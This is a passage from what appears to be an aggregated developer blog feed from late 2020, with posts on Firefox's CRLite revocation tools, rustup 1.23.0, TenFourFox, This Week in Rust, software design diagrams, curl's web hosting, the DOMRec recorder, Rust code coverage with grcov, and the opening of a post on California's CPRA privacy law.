J.C. JonesAuditing the CRLs in CRLite

Since Firefox Nightly is now using CRLite to determine if enrolled websites’ certificates are revoked, it’s useful to dig into the data to answer why a given certificate issuer gets enrolled or not.

Ultimately this is a matter of whether the CRLs for a given issuer are available to CRLite, and are valid, but the Internet is a messy place, and sometimes things don’t work as planned. If an issuing CA is not enrolled in CRLite, the Mozilla infrastructure emits enough information to figure out what went wrong.

Digging into CRLite’s Data Sets

Mozilla’s infrastructure publishes not only the filters and stashes that define the CRLite state-of-the-WebPKI, it also publishes all the intermediate datasets that can be used to both reproduce the filters, and validate them.

I have a tool, crlite-status, which barely sticks a toe into the water of these datasets.

crlite-status is distributed as a Python package that can be installed via a simple invocation of pip:

pip install crlite-status

It downloads data directly from the Google Cloud Storage buckets for the production and staging environments, and parses out some of the useful statistics. For a simple example, asking for the last four runs out of the default production environment:

Four recent CRLite runs <figcaption>Four recent CRLite runs</figcaption>

It gets more exciting when enabling CRL auditing, as CRLs dermine whether an issuer is “enrolled” in CRLite or not:

crlite-status showing not-enrolled issuers <figcaption>crlite-status showing not-enrolled issuers</figcaption>

For just the most recent run, we can see which issuers were excluded from CRLite due to CRL issues, marked with a red X. There are actually six of them.

Even more details to trace this information is available with the --crl-details <path> command line option. I’ve posted one output from 20201126-0 as an example. Using that 20201126-0, one can see that all three CertCloud issuers are not enrolled as their CRLs are returning a status 403 Forbidden, while the Actalis URL is giving a 404 Not Found. TeleSec’s CRL is hosted at a domain that is down entirely. Starfield and Secom both had recoverable warnings, though the Starfield root failed to recover and details would have to be harvested from the crls and logs directory, while the Secom issuer remained enrolled on the basis of the already-cached CRL still being valid.

More to do

Lots of the CRLite CRL auditing is manual, still. Since the whole state of the generation task gets uploaded to the Google Cloud Filestore, it’s always possible to determine what state existed for CRLite at the time it made its enrollment decisions, certainly better tools would make it a simpler process.

The Rust Programming Language BlogAnnouncing Rustup 1.23.0

The rustup working group is happy to announce the release of rustup version 1.23.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.23.0 is as easy as closing your IDE and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.23.0

Support for Apple M1 devices

Rustup is now natively available for the new Apple M1 devices, allowing you to install it on the new Macs the same way you'd install it on other platforms!

Note that at the time of writing this blog post the aarch64-apple-darwin compiler is at Tier 2 target: precompiled binaries are available starting from Rust 1.49 (currently in the beta channel), but no automated tests are executed on them.

You can follow issue #73908 to track the work needed to bring Apple Silicon support to Tier 1.

Support for installing minor releases

The Rust team releases a new version every six weeks, bringing new features and bugfixes on a regular basis. Sometimes a regression slips into a stable release, and the team releases a "point release" containing fixes for that regression. For example, 1.45.1 and 1.45.2 were point releases of Rust 1.45.0, while 1.46.0 and 1.47.0 both had no point releases.

With rustup 1.22.1 or earlier if you wanted to use a stable release you were able to either install stable (which automatically updates to the latest one) or a specific version number, such as 1.48.0, 1.45.0 or 1.45.2. Starting from this release of rustup (1.23.0) you can also install a minor version without specifying the patch version, like 1.48 or 1.45. These "virtual" releases will always point to the latest patch release of that cycle, so rustup toolchain install 1.45 will get you a 1.45.2 toolchain.

New format for rust-toolchain

The rustup 1.5.0 release introduced the rust-toolchain file, allowing you to choose the default toolchain for a project. When the file is present rustup ensures the toolchain specified in it is installed on the local system, and it will use that version when calling rustc or cargo:

$ cat rust-toolchain
nightly-2020-07-10
$ cargo --version
cargo 1.46.0-nightly (fede83ccf 2020-07-02)

The file works great for projects wanting to use a specific nightly version, but didn't allow to add extra components (like clippy) or compilation targets. Rustup 1.23.0 introduces a new, optional TOML syntax for the file, with support for specifying components and targets:

[toolchain]
channel = "nightly-2020-07-10"
components = ["rustfmt", "clippy"]
targets = ["wasm32-unknown-unknown"]

The new syntax doesn't replace the old one, and both will continue to work. You can learn more about overriding the default toolchain in the "Overrides" chapter of the rustup book.

Other changes

There are more changes in rustup 1.23.0: check them out in the changelog! Rustup's documentation is also available in the rustup book starting from this release.

Thanks

Thanks to all the contributors who made rustup 1.23.0 possible!

  • Aaron Loucks
  • Aleksey Kladov
  • Aurelia Dolo
  • Camelid
  • Chansuke
  • Carol (Nichols || Goulding)
  • Daniel Silverstone
  • Dany Marcoux
  • Eduard Miller
  • Eduardo Broto
  • Eric Huss
  • Francesco Zardi
  • FR Bimo
  • Ivan Nejgebauer
  • Ivan Tham
  • Jake Goulding
  • Jens Reidel
  • Joshua M. Clulow
  • Joshua Nelson
  • Jubilee Young
  • Leigh McCulloch
  • Lzu Tao
  • Matthias Krüger
  • Matt Kraai
  • Matt McKay
  • Nick Ashley
  • Pascal Hertleif
  • Paul Lange
  • Pietro Albini
  • Robert Collins
  • Stephen Muss
  • Tom Eccles

Cameron KaiserTenFourFox FPR30b1 available

TenFourFox Feature Parity Release 30 beta 1 is now available (downloads, hashes, release notes). I managed to make some good progress on backporting later improvements to the network and URL handling code, so there are no UI-facing features in this release, but the browser should use a bit less memory and run a little quicker especially on pages that reference a lot of resources (which, admittedly, is a lot of sites these days). There is also a minor update to the host database for basic adblock. Assuming all goes well, this release will come out parallel with Firefox 84 on or around December 15. I'll probably do an SPR-only build for the release immediately following to give myself a break; this will contain just needed security fixes, and there will most likely not be a beta.

A few people got bitten by not noticing the locale update, so let me remind everyone that FPR29 needs new locales if you are using a custom langpack. They're linked from the main TenFourFox page and all of them are on SourceForge except for the separately-maintained Japanese version, which I noticed has also been updated to FPR29. If you get a weird error starting TenFourFox and you have a langpack installed, quit the browser and run the new langpack installer and it should fix itself.

Finally, in case you missed it, with the right browser and a side-car TLS 1.2 proxy, you can get A/UX, Power MachTen (on any classic MacOS supporting it) and pre-Tiger Mac OS X able to access modern web pages again. The key advance here is that the same machine can also run the proxy all by itself: no cheating with a second system! Sadly, this does not work as-is with all browsers, including with Classilla, which is something I'll think about allowing as a down payment on proper in-browser support at some future date.

J.C. JonesQuerying CRLite for WebPKI Revocations

Firefox Nightly is now using CRLite to determine if websites’ certificates are revoked — e.g., if the Certificate Authority published that web browsers shouldn’t trust that website certificate. Telemetry shows that querying the local CRLite dataset is much faster than making a network connection for OCSP, which makes intuitive sense. It also avoids sending the website’s certificate information in cleartext over the network to check the revocation status: solving one of the remaining cleartext browsing data leakages in Firefox.

Mozilla is currently publishing CRLite data to Remote Settings four times per day, keeping a very fresh set of revocation information for the public Web. I’ve provided some direct details on how to get at that data from the CRLite FAQ, and I want to introduce one of my command-line tools I’ve used to analyze and play with the dataset: moz_crlite_query. I’ll introduce crlite_status in a later post.

Querying CRLite Status at the CLI

moz_crlite_query is a Python tool that more-or-less implements the same algorithm Firefox does to check a website’s certificate against CRLite. It maintains a local database of the CRLite dataset in your ~/.crlite_db/ directory, which for me right now looks like:

      0 Nov 25 09:24 .last_updated
5381898 Nov 25 09:24 2020-11-24T00:08:12+00:00Z-full
  27363 Nov 25 09:24 2020-11-24T06:08:12+00:00Z-diff
  59196 Nov 25 09:24 2020-11-24T12:08:14+00:00Z-diff
  56121 Nov 25 09:24 2020-11-24T18:08:15+00:00Z-diff
 204863 Nov 25 09:24 2020-11-25T00:08:23+00:00Z-diff
  25826 Nov 25 09:24 2020-11-25T06:08:05+00:00Z-diff
  66626 Nov 25 09:24 2020-11-25T12:08:22+00:00Z-diff
  25826 Nov 25 09:24 2020-11-25T06:08:05+00:00Z-diff
  66626 Nov 25 09:24 2020-11-25T12:08:22+00:00Z-diff
  53783 Nov 25 22:19 2020-11-25T18:08:11+00:00Z-diff
 190353 Nov 25 22:19 2020-11-26T00:08:11+00:00Z-diff
1118208 Nov 25 22:19 intermediates.sqlite

You can see here that the last full CRLite filter update happened at the midnight-UTC update on 24 November 2020, and since then there have been eight delta updates (e.g., “stashes”).

moz_crlite_query is distributed as a Python package that can be installed via an invocation of pip (Note that this tool requires Python 3.7 or newer because of SQLite features.):

pip install moz_crlite_query

On invocation, the tool will try and update to the latest CRLite data, unless it already updated in the last several hours.

You can query the CRLite status for either a certificate you already have, or the tool can connect to one or more websites and examine the certificates presented there.

Experimenting with the Query Tool

Let’s download a few certificates into /tmp from crt.sh: 77575263, 1988442812, 1485147627, and 2680822568. These simply are representative – right now – of various states in the Web PKI.

○ → for id in 77575263 1988442812 1485147627 2680822568; do
>   curl --silent https://crt.sh/?d=${id} > /tmp/${id}.pem
> done

Now, run them all through CRLite:

○ → moz_crlite_query /tmp/*.pem
INFO:crlite_query:CRLite Update: Syncing CRLite filters.
100% (9 of 9) |######################################################| Elapsed Time: 0:00:00 Time:  0:00:00
INFO:query_cli:Status: 2457 Intermediates, Current filter: 2020-11-24T00:08:12+00:00Z-full
with 27 layers and 43053008 bit-count, 8 stash files with 43022 stashed revocations,
up-to-date as of 2020-11-26 00:08:11+00:00 (5:11:15.467645 ago).
/tmp/1485147627.pem      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                         Enrolled in CRLite: ❌
                         Result: ❔ Not Enrolled ❔
/tmp/1988442812.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                         Enrolled in CRLite: ✅
                         Revoked via CRLite filter: 2020-11-24T00:08:12+00:00Z-full
                         Result: ⛔️ Revoked ⛔️
/tmp/2680822568.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                         Enrolled in CRLite: ✅
                         Result: 👍 Valid 👍
/tmp/77575263.pem      Issuer: CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US
                       Enrolled in CRLite: ✅
                       Result: ⏰ Expired ⏰

We can see 1485147627 is issued by a CA not participating in CRLite: Let’s Encrypt doesn’t publish CRLs. 1988442812 is for revoked.badssl.com, and is revoked. 2680822568 is currently a certificate used for many Mozilla properties, like firefox.com and taskcluster.net. Finally, 77575263 is an expired certificate for blog.mozilla.com (and some others).

We can also supply hosts, either on the command line, as an input file, or both:

○ → cat >/tmp/top4.txt <<EOF
apple.com
youtube.com
www.google.com:443
# This is definitely half of my top 8 spaces
www.blogger.com
EOF

○ → moz_crlite_query --hosts mozilla.com firefox.com --hosts getfirefox.net --hosts-file /tmp/top4.txt
INFO:query_cli:Database was updated at 2020-11-25 22:19:26.467085, skipping.
INFO:query_cli:Status: 2457 Intermediates, Current filter: 2020-11-24T00:08:12+00:00Z-full
with 27 layers and 43053008 bit-count, 8 stash files with 43022 stashed revocations,
up-to-date as of 2020-11-26 00:08:11+00:00 (5:21:25.126138 ago).
mozilla.com:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                     Enrolled in CRLite: ❌
                     Result: ❔ Not Enrolled ❔
firefox.com:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                     Enrolled in CRLite: ❌
                     Result: ❔ Not Enrolled ❔
getfirefox.net:443      Issuer: CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US
                        Enrolled in CRLite: ❌
                        Result: ❔ Not Enrolled ❔
apple.com:443      Issuer: CN=DigiCert SHA2 Extended Validation Server CA-3,OU=www.digicert.com,O=DigiCert\, Inc.,C=US
                   Enrolled in CRLite: ✅
                   Result: 👍 Valid 👍
youtube.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                     Enrolled in CRLite: ✅
                     Result: 👍 Valid 👍
www.google.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                        Enrolled in CRLite: ✅
                        Result: 👍 Valid 👍
www.blogger.com:443      Issuer: CN=GTS CA 1O1,O=Google Trust Services,C=US
                         Enrolled in CRLite: ✅
                         Result: 👍 Valid 👍

This is all in good fun, but there’s more possibility here than just a command-line gimmick.

Embedding CRLite into Other Tools?

Many tools use the Mozilla Root CA program’s list of trust anchors for their trust decisions, particularly on Linux or BSD operating systems. For many such tools, certificate revocations are sufficiently unlikely and the consequences sufficiently low that checking revocation status is simply unimportant. For those tools that do check, leaking the status check in cleartext to network observers is likely to simply be evidence of doing a software update. However, I can imagine that some tools might benefit from CRLite’s infrastructure-as-a-service, and make good use of the privacy benefit.

As it’s not particularly difficult to develop a CRLite client, perhaps if this tooling makes it to Firefox Release, we’ll see some libraries for non-Firefox users of CRLite.

While Mozilla certainly isn’t intending to have numerous users of the data beyond Firefox — at least they aren’t accounted for in the budget — the data is there, and there to be useful.

The Talospace ProjectFirefox 83 on POWER

LTO-PGO is still working great in Firefox 83, which expands in-browser PDF support, adds additional features to Picture-in-Picture (which is still one of my favourite tools in Firefox) and some miscellany developer changes. The exact same process, configs and patches to build a fully link-time and profile-guided optimized build work that were used in Firefox 82.

Dan Horák has filed three bugs (1679271, 1679272 and 1679273) for build failures related to the internal profiler, which is still not supported on ppc64, ppc64le or s390x (or, for that matter, 32-bit PowerPC). These targetted fixes should be landing well before release, but perhaps we should be thinking about how to get it working on OpenPOWER rather than having to play emergency games of whack-a-mole whenever the build blows up.

This Week In RustThis Week in Rust 366

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is cargo-intraconv, a cargo subcommand to convert links in rust documentation to the newly stable intra-doc-links format.

Thanks to Alexis Bourget for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

345 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-24: 1 Regression, 2 Improvements, 2 mixed

This week saw landing of #79237 which by itself provides no wins but opens the door to support for split debuginfo on macOS. This'll eventually show huge wins as we can likely avoid re-collecting debuginfo while retaining support for lldb and Rust backtraces. #79361 tracks the stabilization of the rustc flag, but the precise rollout to stable users is not yet 100% clear.

Triage done by @jyn514 and @simulacrum.

4 regressions, 4 improvements, 2 mixed results. 5 of them in rollups.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

No Tracking Issues or PRs are currently in the final comment period.

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

I know noting about the compiler internals but it looks to me as if 90% of the time is spent pretty-printing LayoutError.

Vadzim Dambrouski on github

Thanks to mmmmib for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Allen Wirfs-BrockSoftware Diagrams Aren’t Always Correct and That’s OK

This morning I saw an interesting twitter thread:

Tudor is the driving-force behind gtoolkit.com, a modern and innovative programming environment that builds upon and extends classic Smalltalk development concepts. Tudor is someone worth listening to, but his tweet was something that I really couldn’t agree with. I found myself more in agreement with Andrei Pacurariu’s reply.

I started to tweet a response but quickly found that my thoughts were too complex to make a good tweet stream. Instead, I wrote the following mini essay.


Concretely, software is just bits in electronic storage that control and/or are manipulated by processors.  Abstractions are the building blocks that enable humans to design and build complex software systems out of bits.  Abstractions are products of out minds—they allow us to assign meaning to clusters (some large, some small) of bits. They allow us to build software systems without thinking about billions of bits or how processors work.

We manifest some useful and generally simple abstractions (instructions, statements, functions, classes, modules, etc.) as “code” using other abstractions we call “languages.”  Languages give us a common vocabulary for us to communicate about those abstract building blocks and to produce the corresponding bits.  There are many useful tools that can and should be created to help us understand the code-level operation of a system.

But most systems we build today are too complex to be fully understood at the level of code. In designing them we must use higher-level abstractions to conceptualize, compose, and organize code. Abstract machines, frameworks, patterns, roles, stereotypes, heuristics, constraints, etc. are examples of such higher-level abstractions.

The languages we commonly use provide few, if any, mechanisms for directly identifying such higher-level abstractions.  These abstractions may manifest as naming or other coding conventions but recognizing them as such depends upon a pre-existing shared understanding between the writer and readers of the code.

If such conventions have been adequately formalized and followed, a tool may be able to assist a human identify and display the usage of higher-level abstractions within a code base. But traditionally, such tools are rare and often unreliable.  One problem is that abstractions can overlap. So we (or the tools) not only need to identify and classify abstractions but also identify the clustering and organization of abstractions. Sometimes this results in multiple views that can provide totally different conceptions of the operation of the code we are looking at.

Software designers/architects often use informal diagrams to capture their conceptualization of the structure and interactions of the higher-level abstractions of their designs. Such diagrams can serve as maps that help developers understand the territory of the code. 

But developers are often skeptical of such diagrams. Experience (and folklore) has taught them that design diagrams likely do not accurately reflect the actual state of a code base.  So, how do we familiarize ourselves with a new software code base that we wish to modify or extend? Most commonly we just try to reverse engineer its architecture/design by examining the code. We tell ourselves that the code provides the ground truth and that we or our tools can generate truthful design docs from the code because the code doesn’t lie. When humans read code we can easily miss or misinterpret the higher-level abstractions that are lurking among and above the code. It’s a real challenge to imagine a tool that can do better.

Lacking design documents or even a good sense of a system’s overall design we then often make local code changes without correctly understanding the design context within which that code operates. Such local changes may “work” to solve some immediate problem. But as they accumulate over long periods such changes erode the design integrity of the overall system. And they contribute to the invalidation of any pre-existing design documents and diagrams that may have at one point in time provided an accurate map of the system. 

We definitely need better tools for integrating higher-level system architecture/design abstraction with code—or at least for integrating documentation.  But don’t tell me that creating such documents are a waste of time or that any such documents should be ignored.  I’ve spent too many decades trying to guess how a complex program was intended to work by trying to use the code to get into the mind of the original designers and developers.  Any design documentation is useful documentation. It will probably need to be verified against the current state of the code but even when the documents are no longer the truth they often provide insights that help our understanding of the system.  When I asked Rebecca Wirfs-Brock to review this little essay, she had an experience to relate:

I remember doing a code/architecture review for a company that built software to perform high reliability backups…and I was happy that the architectural documents were say 70% accurate as they gave me a good look into the mind of the architect who engineered these frameworks. And I didn’t think it worthwhile to update it to reflect truth. As it was a snapshot in time. Sometimes updating may be worthwhile, but as in archeological digs, you’ve gotta be careful about this.

Diagrams and other design documents probably won’t be up to date when somebody reads them in the future. But that’s not an excuse to not create them. If you care about the design integrity of you software system you need to provide future developers (including yourself) a map of your abstract design as you currently know it.

Daniel StenbergThe curl web infrastructure

The purpose of the curl web site is to inform the world about what curl and libcurl are and provide as much information as possible about the project, the products and everything related to that.

The web site has existed in some form for as long as the project has, but it has of course developed and changed over time.

Independent

The curl project is completely independent and stands free from influence from any parent or umbrella organization or company. It is not even a legal entity, just a bunch of random people cooperating over the Internet. And a bunch of awesome sponsors to help us.

This means that we have no one that provides the infrastructure or marketing for us. We need to provide, run and care for our own servers and anything else we think we should offer our users.

I still do a lot of the work in curl and the curl web site and I work full time on curl, for wolfSSL. This might of course “taint” my opinions and views on matters, but doesn’t imply ownership or control. I’m sure we’re all colored by where we work and where we are in our lives right now.

Contents

Most of the web site is static content: generated HTML pages. They are served super-fast and very lightweight by any web server software.

The web site source exists in the curl-www repository (hosted on GitHub) and the web site syncs itself with the latest repository changes several times per hour. The parts of the site that aren’t static are mostly consisting of smaller scripts that run either on demand at the time of a request or on an interval in a cronjob in the background. That is part of the reason why pushing an update to the web site’s repository can take a little while until it shows up on the live site.

There’s a deliberate effort at not duplicating information so a lot of the web pages you can find on the web site are files that are converted and “HTMLified” from the source code git repository.

“Design”

Some people say the curl web site is “retro”, others that it is plain ugly. My main focus with the site is to provide and offer all the info, and have it be accurate and accessible. The look and the design of the web site is a constant battle, as nobody who’s involved in editing or polishing the web site is really interested in or particularly good at design, looks or UX. I personally have done most of the editing of it, including CSS etc and I can tell you that I’m not good at it and I don’t enjoy it. I do it because I feel I have to.

I get occasional offers to “redesign” the web site, but the general problem is that those offers almost always involve rebuilding the entire thing using some current web framework, not just fixing the looks, layout or hierarchy. By replacing everything like that we’d get a lot of problems to get the existing information in there – and again, the information is more important than the looks.

The curl logo is designed by a proper designer however (Adrian Burcea).

If you want to help out designing and improving the web site, you’d be most welcome!

Who

I’ve already touched on it: the web site is mostly available in git so “anyone” can submit issues and pull-requests to improve it, and we are around twenty persons who have push rights that can then make a change on the live site. In reality of course we are not that many who work on the site any ordinary month, or even year. During the last twelve month period, 10 persons authored commits in the web repository and I did 90% of those.

How

Technically, we build the site with traditional makefiles and we generate the web contents mostly by preprocessing files using a C-like preprocessor called fcpp. This is an old and rather crude setup that we’ve used for over twenty years but it’s functional and it allows us to have a mostly static web site that is also fairly easy to build locally so that we can work out and check improvements before we push them to the git repository and then out to the world.

The web site is of course only available over HTTPS.

Hosting

The curl web site is hosted on an origin VPS server in Sweden. The machine is maintained by primarily by me and is paid for by Haxx. The exact hosting is not terribly important because users don’t really interact with our server directly… (Also, as they’re not sponsors we’re just ordinary customers so I won’t mention their name here.)

CDN

A few years ago we experienced repeated server outages simply because our own infrastructure did not handle the load very well, and in particular not the traffic spikes that could occur when I would post a blog post that would suddenly reach a wide audience.

Enter Fastly. Now, when you go to curl.se (or daniel.haxx.se) you don’t actually reach the origin server we admin, you will instead reach one of Fastly’s servers that are distributed across the world. They then fetch the web contents from our origin, cache it on their edge servers and send it to you when you browse the site. This way, your client speaks to a server that is likely (much) closer to you than the origin server is and you’ll get the content faster and experience a “snappier” web site. And our server only gets a tiny fraction of the load.

Technically, this is achieved by the name curl.se resolving to a number of IP addresses that are anycasted. Right now, that’s 4 IPv4 addresses and 4 IPv6 addresses.

The fact that the CDN servers cache content “a while” is another explanation to why updated contents take a little while to “take effect” for all visitors.

DNS

When we just recently switched the site over to curl.se, we also adjusted how we handle DNS.

I run our own main DNS server where I control and admin the zone and the contents of it. We then have four secondary servers to help us really up our reliability. Out of those four secondaries, three are sponsored by Kirei and are anycasted. They should be both fast and reliable for most of the world.

With the help of fabulous friends like Fastly and Kirei, we hope that the curl web site and services shall remain stable and available.

DNS enthusiasts have remarked that we don’t do DNSSEC or registry-lock on the curl.se domain. I think we have reason to consider and possibly remedy that going forward.

Traffic

The curl web site is just the home of our little open source project. Most users out there in the world who run and use curl or libcurl will not download it from us. Most curl users get their software installation from their Linux distribution or operating system provider. The git repository and all issues and pull-requests are done on GitHub.

Relevant here is that we have no logging and we run no ads or any analytics. We do this for maximum user privacy and partly because of laziness, since handling logging from the CDN system is work. Therefore, I only have aggregated statistics.

In this autumn of 2020, over a normal 30 day period, the web site serves almost 11 TB of data to 360 million HTTP requests. The traffic volume is up from 3.5 TB the same time last year. 11 terabytes per 30 days equals about 4 megabytes per second on average.

Without logs we cannot know what people are downloading – but we can guess! We know that the CA cert bundle is popular and we also know that in today’s world of containers and CI systems, a lot of things out there will download the same packages repeatedly. Otherwise the web site is mostly consisting of text and very small images.

One interesting specific pattern on the server load that’s been going on for months: every morning at 05:30 UTC, the site gets over 50,000 requests within that single minute, during which 10 gigabytes of data is downloaded. The clients are distributed world wide as I see the same pattern on access points all over. The minute before and the minute after, the average traffic rate remains at 200MB/minute. It makes for a fun graph:

<figcaption>An eight hour zoomed in window of bytes transferred from the web site. UTC times.</figcaption>

Our servers suffer somewhat from being the target of weird clients like qqgamehall that continuously “hammer” the site with requests at a high frequency many months after we started always returning error to them. An effect they have is that they make the admin dashboard to constantly show a very high error rate.

Software

The origin server runs Debian Linux and Apache httpd. It has a reverse proxy based on nginx. The DNS server is bind. The entire web site is built with free and open source. Primarily: fcpp, make, roffit, perl, curl, hypermail and enscript.

If you curl the curl site, you can see in response headers that Fastly uses Varnish.

Robert O'CallahanDOM Recording For Web Application Demos

To show off the power of our Pernosco debugger, we wanted many short demo videos of the application interface. Regular videos are relatively heavyweight and lossy; we wanted something more like Asciinema, but for our Web application, not just a terminal. So we created DOMRec, a DOM recorder.

The approach is surprisingly straightforward. To record a demo, we inject the DOMRec script into our application. DOMRec captures the current DOM state and uses a DOM Mutation Observer to record all DOM state changes with associated timestamps. To replay the demo, we create an iframe, fill it with the recorded initial DOM state, then replay the DOM state changes over time. Replay inserts links to the original stylesheets but doesn't load or execute the original scripts. (Of course it couldn't be quite that simple ... see below.)

The resulting demos are compact (most of ours are less than 100KB gzipped), work on almost any browser/device, and are pixel-perfect at any zoom level. DOMRec supports single-frame screenshots when dynamism is not required. We can't use browser HTML5 video controls but we implement play/pause/fullscreen buttons.

Capturing DOM state isn't quite enough because some rendering-relevant state isn't in the DOM. DOMRec logs mouse movement and click events and during replay, displays a fake mouse cursor and click effect. DOMRec tracks focus changes, and during replay sets "fake focus" classes on relevant DOM elements; our application style sheets check those classes in addition to the real :focus and :focus-within pseudoclasses. When necessary DOMRec creates a fake caret. DOMRec captures scroll offsets and makes a best-effort attempt to match scroll positions during recording and replay. Canvas drawing operations don't change the DOM and don't trigger events, so our application manually triggers a "didDrawCanvas" DOM event which DOMRec listens for. Sometimes the Pernosco client needs to trigger a style flush to get CSS transitions to work properly, which also needs to happen during replay, so we fire a special notification event for that too. It's a bit ad-hoc — we implemented just enough for needs, and no more — but it does at least handle Microsoft's Monaco editor correctly, which is pretty complicated.

DOMRec can record demos executed manually, but in practice our demos are scripted using Selenium so that we can rebuild the demo movie when our application interface has changed.

This kind of thing has certainly been built many times — see Inspectlet and its competitors — so when I first looked into this problem a few years ago I assumed I would find an open-source off-the-shelf solution. Unfortunately I couldn't find one that looked easy to consume. Now we're releasing DOMRec with an MIT license. To tell the truth, we're not trying hard to make DOMRec easy to consume, either; as noted above, some applications need to be tweaked to work with it, and this blog post is about all you're going to get in terms of documentation. Still, it's only 1200 lines of standalone Javascript so people may find it easier than starting from scratch.

Marco CastelluccioHow to collect Rust source-based code coverage

TL;DR: For those of you who prefer an example to words, you can find a complete and simple one at https://github.com/marco-c/rust-code-coverage-sample.

Source-based code coverage was recently introduced in Rust. It is more precise than the gcov-based coverage, with fewer workarounds needed. Its only drawback is that it makes the profiled program slower than with gcov-based coverage.

In this post, I will show you a simple example on how to set up source-based coverage on a Rust project, and how to generate a report using grcov (in a readable format or in a JSON format which can be parsed to generate custom reports or upload results to Coveralls/Codecov).

Install requirements

First of all, let’s install grcov:

cargo install grcov

Second, let’s install the llvm-tools Rust component (which grcov will use to parse coverage artifacts):

rustup component add llvm-tools-preview

At the time of writing, the component is called llvm-tools-preview. It might be renamed to llvm-tools soon.

Build

Let’s say we have a simple project, where our main.rs is:

use std::fmt::Debug;

#[derive(Debug)]
pub struct Ciao {
    pub saluto: String,
}

fn main() {
    let ciao = Ciao{ saluto: String::from("salve") };

    assert!(ciao.saluto == "salve");
}

In order to make Rust generate an instrumented binary, we need to use the -Zinstrument-coverage flag (Nightly only for now!):

export RUSTFLAGS="-Zinstrument-coverage"

Now, build with clang build.

The compiled instrumented binary will appear under target/debug/:

.
├── Cargo.lock
├── Cargo.toml
├── src
│   └── main.rs
└── target
    └── debug
        └── rust-code-coverage-sample

The instrumented binary contains information about the structure of the source file (functions, branches, basic blocks, and so on).

Run

Now, the instrumented executable can be executed (cargo run, cargo test, or whatever). A new file with the extension ‘profraw’ will be generated. It contains the coverage counters associated with your binary file (how many times a line was executed, how many times a branch was taken, and so on). You can define your own name for the output file (might be necessary in some complex test scenarios like we have on grcov) using the LLVM_PROFILE_FILE environment variable.

LLVM_PROFILE_FILE="your_name-%p-%m.profraw"

%p (process ID) and %m (binary signature) are useful to make sure each process and each binary has its own file.

Your tree will now look like this:

.
├── Cargo.lock
├── Cargo.toml
├── default.profraw
├── src
│   └── main.rs
└── target
    └── debug
        └── rust-code-coverage-sample

At this point, we just need a way to parse the profraw file and the associated information from the binary.

Parse with grcov

grcov can be downloaded from GitHub (from the Releases page).

Simply execute grcov in the root of your repository, with the --binary-path option pointing to the directory containing your binaries (e.g. ./target/debug). The -t option allows you to specify the output format:

  • “html” for a HTML report;
  • “lcov” for the LCOV format, which you can then translate to a HTML report using genhtml;
  • “coveralls” for a JSON format compatible with Coveralls/Codecov;
  • “coveralls+” for an extension of the former, with addition of function information. There are other formats too.

Example:

grcov . --binary-path PATH_TO_YOUR_BINARIES_DIRECTORY -s . -t html --branch --ignore-not-existing -o ./coverage/

This is the output:

Your browser does not support iframes.

This would be the output with gcov-based coverage:

Your browser does not support iframes.

You can also run grcov outside of your repository, you just need to pass the path to the directory where the profraw files are and the directory where the source is (normally they are the same, but if you have a complex CI setup like we have at Mozilla, they might be totally separate):

grcov PATHS_TO_PROFRAW_DIRECTORIES --binary-path PATH_TO_YOUR_BINARIES_DIRECTORY -s PATH_TO_YOUR_SOURCE_CODE -t html --branch --ignore-not-existing -o ./coverage/

grcov has other options too, simply run it with no parameters to list them.

In the grcov’s docs, there are also examples on how to integrate code coverage with some CI services.

Mozilla Open Policy & Advocacy BlogFour key takeaways to CPRA, California’s latest privacy law

California is on the move again in the consumer privacy rights space. On Election Day 2020 California voters approved Proposition 24 the California Privacy Rights Act (CPRA). CPRA – commonly called CCPA 2.0 – builds upon the less than two year old California Consumer Privacy Act (CCPA) continuing the momentum to put more control over personal data in people’s hands, additional compliance obligations for businesses and creating a new California Protection Agency for regulation and enforcement

With federal privacy legislation efforts stagnating during the last years, California continues to set the tone and expectations that lead privacy efforts in the US. Mozilla continues to support data privacy laws that empower people, including the European General Data Protection Regulation (GDPR), California Consumer Privacy Act, (CCPA) and now the California Privacy Rights Act (CPRA). And while CPRA is far from perfect it does expand privacy protections in some important ways.

Here’s what you need to know. CPRA includes requirements we foresee as truly beneficial for consumers such as additional rights to control their information, including sensitive personal information, data deletion, correcting inaccurate information, and putting resources in a centralized authority to ensure there is real enforcement of violations.

CPRA gives people more rights to opt-out of targeted advertising

